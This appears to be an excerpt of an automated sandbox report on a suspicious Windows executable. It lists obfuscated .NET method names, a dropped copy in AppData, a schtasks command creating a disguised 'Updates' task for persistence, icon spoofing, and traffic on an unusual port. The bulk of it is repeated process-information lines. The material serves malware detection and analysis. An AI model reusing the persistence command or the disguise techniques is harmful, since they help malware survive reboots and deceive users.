                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, LJ8oiC1eS7PGnRSA42.csHigh entropy of concatenated method names: 'yDqaP5Hkr5', 'u67aweWJZ6', 'gLLa8GikPJ', 'ToString', 'mxaaYcLddr', 'UV6aBq7G4C', 'SOFpvuZPeDG2LxiGrbH', 'xwjaPdZ2N1x59gfUSPe', 'kJvQhdZF8DhDsKFda8U', 'vLEWhnZR292i8jpSWqc'
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, b4qHZDcc0nAciqFniwf.csHigh entropy of concatenated method names: 'ToString', 'V0JolS8bK5', 'joHoDsbk6Z', 'Pf2oep5kcj', 'FXGo7XO5IR', 'PatoCYoM46', 'xvloGGsWM2', 'jxoodfP60B', 'KkpZwYWaONucuraJbey', 'QxQ15kWxptL59WAhGLn'
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, AsSLmhwmmHpiPOlkjR.csHigh entropy of concatenated method names: 'MMaKJ2hxY', 'PDXkxmNIV', 'CericXebT', 'bhXU2ISbr', 'GK63d5hf9', 'CSdhx1sHo', 'CXfOBFQMi1EXtmhc82', 'ljfi6xRDtNbJxiLJEN', 'WpkaPucoxJ5CNTFCwi', 'tJPsF3PQb'
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, OZjDQJjhgoSGoJH2Mf.csHigh entropy of concatenated method names: 'Dispose', 'lthIFbLsxK', 'H3KTQXBy0n', 'EZa449knZM', 'JBHINuEU2E', 'PHTIzm5W1G', 'ProcessDialogKey', 'U1XTAED3nn', 'q6yTIkx98Y', 'RJGTTAPgGN'
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, TkmJACxTdSe95MAfHl.csHigh entropy of concatenated method names: 'MqRIxIM1Ti', 'Bb6IMsFIP4', 'vY7IcRGXbj', 'dJJItNE0WE', 'npUI0Rxdop', 'IcaISQMxou', 'kolt8AGAVFKYs0wibC', 'YsKpfFs1YowkKbdyl1', 'mi5IIRPJp2', 'tkyIly7fdL'
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, O4OvPwfbGjdF60tQPC.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'FD8TFfe5Us', 'CqrTNkwnln', 'PvxTzjAfXa', 'WBylA4xKRU', 'u8MlIg3gHv', 'BiIlTMxA97', 'cxollj2qk4', 'kUXqWRNK1rkrybSc2Ey'
                    Source: 0.2.PZNfhfaj9O.exe.78f0000.5.raw.unpack, C5c8K7mA0nZqCckpt9.csHigh entropy of concatenated method names: 'hJsCmCGVDC', 'p4uCrwCT9d', 'h1kCPN3Wh0', 'Ks9CwJCSyE', 'tOpC8ifMjT', 'yupCYLso4N', 'sk6CBqicfH', 'INvCVvIKRq', 'IiSCFCZCmN', 'A13CNwOXG1'
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, Bt0JDrciGx8bOf6Gm7A.csHigh entropy of concatenated method names: 'Opo6prByIl', 'LHc6L7CQDs', 'uTb6Kh8aGR', 'bAr6k4UMYH', 'wZq65mvAsh', 'IEt6ietEwL', 'BH86U8t9bA', 'XBP6v2U2pq', 'xHk63QEFRN', 'TRd6hZnEdo'
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, eBxsY6Wh4pPqmZqpGG.csHigh entropy of concatenated method names: 'ToString', 'MZnSfNWdrl', 'OCWSQmq0fc', 'I5IS2ZL0Nk', 'stmSqk0eCr', 'qi4SyFd4xA', 'V3wSbLXg9N', 'T1kSnGAvAd', 'xaGSEFSjCi', 'w3dSjmELuH'
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, v3l6KkE5jZbMdGFeYH.csHigh entropy of concatenated method names: 'bgUs7glEV8', 'djFsCHmP12', 'tfKsGKZAnc', 'RBUsd1847s', 'HtTsaICYYW', 'qkOsxkMAgZ', 'UxvsMYoTny', 'rxbsHKSUkL', 'sU7scKfQF8', 'yPwstt41f2'
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, oVjhAVDiN44n9Uqc01.csHigh entropy of concatenated method names: 'cwExp5F1Hr', 'QmJxLUwSNu', 'xo9xKyKxt4', 'U29xk06xfF', 'bKKx5QfLXV', 'gW1xiv3Oh7', 'LWRxUHX3rr', 'ULWxv3UxCe', 'hZCx3IZAP4', 'corxhUYna7'
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, yEpUT0HkruT90xjmDp.csHigh entropy of concatenated method names: 'qnvGkIvQot', 'klRGiEv130', 'xc0Gvfh0VQ', 'zQLG3TXpdE', 'v0fG0pnGCX', 'QO1GSmM43V', 'fDHGJYEehX', 'TntGskRS9j', 'yKmG6BsJyR', 'PuvGolbXZ6'
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, uBcaQU3fuM2aVBcP0B.csHigh entropy of concatenated method names: 'b8Aae6n9Zl', 'jupaCmonoE', 'TacadTqgoe', 'TZkaxpFQTK', 'yCyaMopgPJ', 'YSjd8EssIH', 'Iu9dYj6xRn', 'dvKdBCws0W', 'eG4dVsESqt', 'DcGdFRLvbM'
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, RxRdm1nit3hOoWDSgZ.csHigh entropy of concatenated method names: 'k5XleAjn0m', 'wAQl7VNo8q', 'pA9lCQc3xp', 'xuOlG930nP', 'ufxld91rj6', 'IeolaLaucm', 'Xvglx3ehgi', 'TZxlMLsyr4', 'FyolHYcFh2', 'fbolcOlMh5'
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, IWZuYAFNkfiXEhFshY.csHigh entropy of concatenated method names: 'is7x7cQPAB', 'fOixGuchRe', 'H3exafmXBs', 'PGvaNuAXov', 'c98azHF9sQ', 'TRkxANutrW', 'yljxIxovCG', 'XtFxTVbn4E', 'XcNxljGuMV', 'bOMxDR91N3'
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, hnewMPvAJJw2EghmA3.csHigh entropy of concatenated method names: 'gQ4JVMVJ86', 'Kv0JNvQkQ6', 'lessAL4Z0Z', 'kimsI1HZLk', 'QjjJfAiiZE', 'A89JRrSd7B', 'GPlJO6TZLb', 'NqpJmn8SMA', 'CbbJrgU3Ck', 'b5ZJP2rB0e'
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, iIf93pzKqqDDVRUiYX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sAR6956J6j', 'GJP60aOKrd', 'Kmf6SSamwp', 'J6j6JY8OAd', 'R3V6sZXurP', 'kHY66KAJoF', 'G5f6o9PjIe'
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, SNtb1GhBB6b7imWkm3.csHigh entropy of concatenated method names: 'Csqs1s9ScN', 'tqvsQK7dSi', 'rrqs2jbTa1', 'GR1sqr18JI', 'lkLsmHH4Ix', 'aNYsyA5v9W', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, cwi7vI4dtyq5xIeGKR.csHigh entropy of concatenated method names: 'Qcp9vLnTVZ', 'VNi93qmm9O', 'YNO91KaVZx', 'xnx9Qwyq5M', 'FZO9qwt4mM', 'cbg9yfs6el', 'IQN9n6tdfR', 'FCI9ErsSwd', 'Ro89X7W3kC', 'Swh9fAeNp0'
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, jXtKLEM4uNuPOdIWlC.csHigh entropy of concatenated method names: 'myed5oFu5j', 'rpCdUpicRA', 'zSEG2HZWfm', 'XDcGqFxwJ7', 'AS4GyLsJbw', 'UMPGbmKmGX', 'KJNGnXXxq1', 'Cl5GEhjih1', 'klLGjE2LPg', 'QerGXacTbH'
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, fxlHQyZ72bmm0p70X2.csHigh entropy of concatenated method names: 'rnN6Iyo3DN', 'Cja6lES52X', 'XZV6Dvkr3g', 'acx67yU3OD', 'a1I6C69I15', 'RN76dKd4rr', 'EjN6ahjEaO', 'mNisBgQhGc', 'uplsVyJpQK', 'vdasFUoJCI'
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, fodRRAQatCMpctZLl5.csHigh entropy of concatenated method names: 'WtG0XVHTUt', 'bKR0RclCxQ', 'ulu0mQUPA2', 'DK80rRjwyb', 'joT0QTvlnA', 'CEX02uctKc', 'f140qG6Gfk', 'l7j0yamZVH', 'cDh0b77tDY', 'tCp0n2i4p1'
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, LJ8oiC1eS7PGnRSA42.csHigh entropy of concatenated method names: 'yDqaP5Hkr5', 'u67aweWJZ6', 'gLLa8GikPJ', 'ToString', 'mxaaYcLddr', 'UV6aBq7G4C', 'SOFpvuZPeDG2LxiGrbH', 'xwjaPdZ2N1x59gfUSPe', 'kJvQhdZF8DhDsKFda8U', 'vLEWhnZR292i8jpSWqc'
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, b4qHZDcc0nAciqFniwf.csHigh entropy of concatenated method names: 'ToString', 'V0JolS8bK5', 'joHoDsbk6Z', 'Pf2oep5kcj', 'FXGo7XO5IR', 'PatoCYoM46', 'xvloGGsWM2', 'jxoodfP60B', 'KkpZwYWaONucuraJbey', 'QxQ15kWxptL59WAhGLn'
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, AsSLmhwmmHpiPOlkjR.csHigh entropy of concatenated method names: 'MMaKJ2hxY', 'PDXkxmNIV', 'CericXebT', 'bhXU2ISbr', 'GK63d5hf9', 'CSdhx1sHo', 'CXfOBFQMi1EXtmhc82', 'ljfi6xRDtNbJxiLJEN', 'WpkaPucoxJ5CNTFCwi', 'tJPsF3PQb'
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, OZjDQJjhgoSGoJH2Mf.csHigh entropy of concatenated method names: 'Dispose', 'lthIFbLsxK', 'H3KTQXBy0n', 'EZa449knZM', 'JBHINuEU2E', 'PHTIzm5W1G', 'ProcessDialogKey', 'U1XTAED3nn', 'q6yTIkx98Y', 'RJGTTAPgGN'
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, TkmJACxTdSe95MAfHl.csHigh entropy of concatenated method names: 'MqRIxIM1Ti', 'Bb6IMsFIP4', 'vY7IcRGXbj', 'dJJItNE0WE', 'npUI0Rxdop', 'IcaISQMxou', 'kolt8AGAVFKYs0wibC', 'YsKpfFs1YowkKbdyl1', 'mi5IIRPJp2', 'tkyIly7fdL'
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, O4OvPwfbGjdF60tQPC.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'FD8TFfe5Us', 'CqrTNkwnln', 'PvxTzjAfXa', 'WBylA4xKRU', 'u8MlIg3gHv', 'BiIlTMxA97', 'cxollj2qk4', 'kUXqWRNK1rkrybSc2Ey'
                    Source: 0.2.PZNfhfaj9O.exe.3f12080.3.raw.unpack, C5c8K7mA0nZqCckpt9.csHigh entropy of concatenated method names: 'hJsCmCGVDC', 'p4uCrwCT9d', 'h1kCPN3Wh0', 'Ks9CwJCSyE', 'tOpC8ifMjT', 'yupCYLso4N', 'sk6CBqicfH', 'INvCVvIKRq', 'IiSCFCZCmN', 'A13CNwOXG1'
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeFile created: C:\Users\user\AppData\Roaming\CiENBY.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\CiENBY" /XML "C:\Users\user\AppData\Local\Temp\tmp3010.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Icon mismatch, binary includes an icon from a different legit application in order to fool users
                    Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (29).png
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49741
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49748
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49749
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PZNfhfaj9O.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
